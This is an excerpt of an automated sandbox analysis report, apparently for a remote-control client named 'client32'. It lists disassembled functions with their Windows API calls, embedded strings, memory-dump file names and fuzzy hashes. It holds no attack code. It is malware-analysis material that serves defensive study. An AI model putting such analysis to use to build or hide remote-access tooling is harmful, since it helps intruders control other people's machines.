SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B

Strings

IPTip_Main_Window, xrefs: 11017053

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A

Function 685B4F31 Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685B4F8C
_memcpy_s.LIBCMT ref: 685B4FFD
__read.LIBCMT ref: 685B5060
__filbuf.LIBCMT ref: 685B507C

Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9

_memset.LIBCMT ref: 685B50BD

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
Instruction ID: 21e50702d3ba13d8cec39f2119d448ec195d598f35b8a1642b1a823c865275f9
Opcode Fuzzy Hash: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
Instruction Fuzzy Hash: 3051D634A00709EBDB24CFA9C86469EB7B1EFA0364F608629E834972D0D771DA51CF91

Function 11061070 Relevance: 7.6, APIs: 5, Instructions: 97timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 11061086

Part of subcall function 11160477: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,1101D218,00000000,7E4636A2,?,?,?,?,?,1117AD21,000000FF), ref: 11160482
Part of subcall function 11160477: __aulldiv.LIBCMT ref: 111604A2

SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061118
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061143
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061151

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__time64
String ID:
API String ID: 3203075409-0
Opcode ID: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
Instruction ID: 9fbe0da520f53b699568b749b3a3eae29a5fc02c94d56d28377b82a7ad20d906
Opcode Fuzzy Hash: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
Instruction Fuzzy Hash: A4315A75D1021DAACF04DFE4D841AEEF7B8EF88714F04856AE805B7280EA756A04CBA5

Function 685AAC30 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 685AAC64
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 685AACA1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 685AACB7
_malloc.LIBCMT ref: 685AACC6
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 685AACE0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__strdup_malloc
String ID:
API String ID: 2291067320-0
Opcode ID: 250e9753a922f86b7f442a628e0a007eee47575bd1111bd0cc7010b5d353e232
Instruction ID: f98865119836ece46800ef7f88c0f787105cb03b73522550ea0b8fd267f73640
Opcode Fuzzy Hash: 250e9753a922f86b7f442a628e0a007eee47575bd1111bd0cc7010b5d353e232
Instruction Fuzzy Hash: 6B31E070A00309FFE7118F64CC59FABBBB8EF46754F108055FD45AB280D670A904CB94

Function 110250E0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
GetDlgItem.USER32(?,00001399), ref: 11025131
TranslateMessage.USER32(?), ref: 1102514A
DispatchMessageA.USER32(?), ref: 11025154
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95

Function 11023370 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
GetDlgItem.USER32(?,00001399), ref: 110233C1
TranslateMessage.USER32(?), ref: 110233DA
DispatchMessageA.USER32(?), ref: 110233E4
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91

Function 685B49F7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 685B4A05

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

_free.LIBCMT ref: 685B4A18

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: f5154de64339ac896a82b26d85caa06d307a92b11fe9aca1339da276fc03e03c
Instruction ID: c4a24ec6d1c87f550e835a274efdc14aef1a7f38bcc6c86a2fde1e3775052987
Opcode Fuzzy Hash: f5154de64339ac896a82b26d85caa06d307a92b11fe9aca1339da276fc03e03c
Instruction Fuzzy Hash: 58110D36444715EFCF315FB9A83469D3796FFF53A4B914425EA6896140EB308D40875C

Function 1103F120 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB

CreateRectRgnIndirect.GDI32(?), ref: 1103F168
CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
DeleteObject.GDI32(00000000), ref: 1103F183
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRect$Indirect
String ID:
API String ID: 3044651595-0
Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93

Function 68596830 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 55COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,?), ref: 685968AE
LeaveCriticalSection.KERNEL32(685DB898), ref: 685968C3

Strings

a3Zh, xrefs: 68596834
RESULT, xrefs: 68596850
ERROR, xrefs: 6859686D

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: ERROR$RESULT$a3Zh
API String ID: 3168844106-3825894136
Opcode ID: 35029747a46a9ee2479f6ad2e1d203fb93af36277bda8b5f2991eb5d8fa06773
Instruction ID: 77f40fa9d6f47367eedfe846d93fcb3e4fcd229525ce85f6bb5fc339e4230a2f
Opcode Fuzzy Hash: 35029747a46a9ee2479f6ad2e1d203fb93af36277bda8b5f2991eb5d8fa06773
Instruction Fuzzy Hash: 540145B7E003417BEF109AA49C41AAF77D89B85198FC50039EE49C7201F735DE4883E6

Function 685B6CFE Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 685B6D0A

Part of subcall function 685B6F64: __getptd_noexit.LIBCMT ref: 685B6F67
Part of subcall function 685B6F64: __amsg_exit.LIBCMT ref: 685B6F74

__getptd.LIBCMT ref: 685B6D21
__amsg_exit.LIBCMT ref: 685B6D2F
__lock.LIBCMT ref: 685B6D3F
__updatetlocinfoEx_nolock.LIBCMT ref: 685B6D53

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: a93aa59c01d722b4e6f5b75a734e5dfcf7e3a47b28967ae788154e076abfac4e
Instruction ID: 298479c68ac2489ba342f32c4400c877fbc963dd56d1f96824bb4e54f2cb8b21
Opcode Fuzzy Hash: a93aa59c01d722b4e6f5b75a734e5dfcf7e3a47b28967ae788154e076abfac4e
Instruction Fuzzy Hash: FCF0E93BD09750DFDB11AFB884217AE37E0AFA0728FD18589EA14A72C0DB344D00CE56

Function 11057380 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 375windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00010480,00000501,00000000,00000000), ref: 11057461

Strings

Warning. DoNotify(%d) not processed, xrefs: 1105835B
Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost
String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
API String ID: 410705778-2398254728
Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0

Function 1101B1E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 110DC630: EnterCriticalSection.KERNEL32(111E9064,11018545,7E4636A2,?,?,?,1117A7A8,000000FF), ref: 110DC631

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1101B426
__CxxThrowException@8.LIBCMT ref: 1101B441

Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A

Strings

NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B399
NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B3BA

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8SectionThrowXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 2637870501-623348194
Opcode ID: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
Instruction ID: 57dd9297704c65ab0c6bcb40d8263c5768676fb733a16b5b2db7577f0494a42a
Opcode Fuzzy Hash: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
Instruction Fuzzy Hash: B87181B5D00359DFEB10CFA4C884BDDFBB4AF05318F248159D825AB381EB75AA84CB91

Function 11021250 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110212B2
IsWindowVisible.USER32(00000000), ref: 11021383
wsprintfA.USER32 ref: 110213C7

Strings

%d,%d,%d,%d,%d,%d, xrefs: 110213C1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
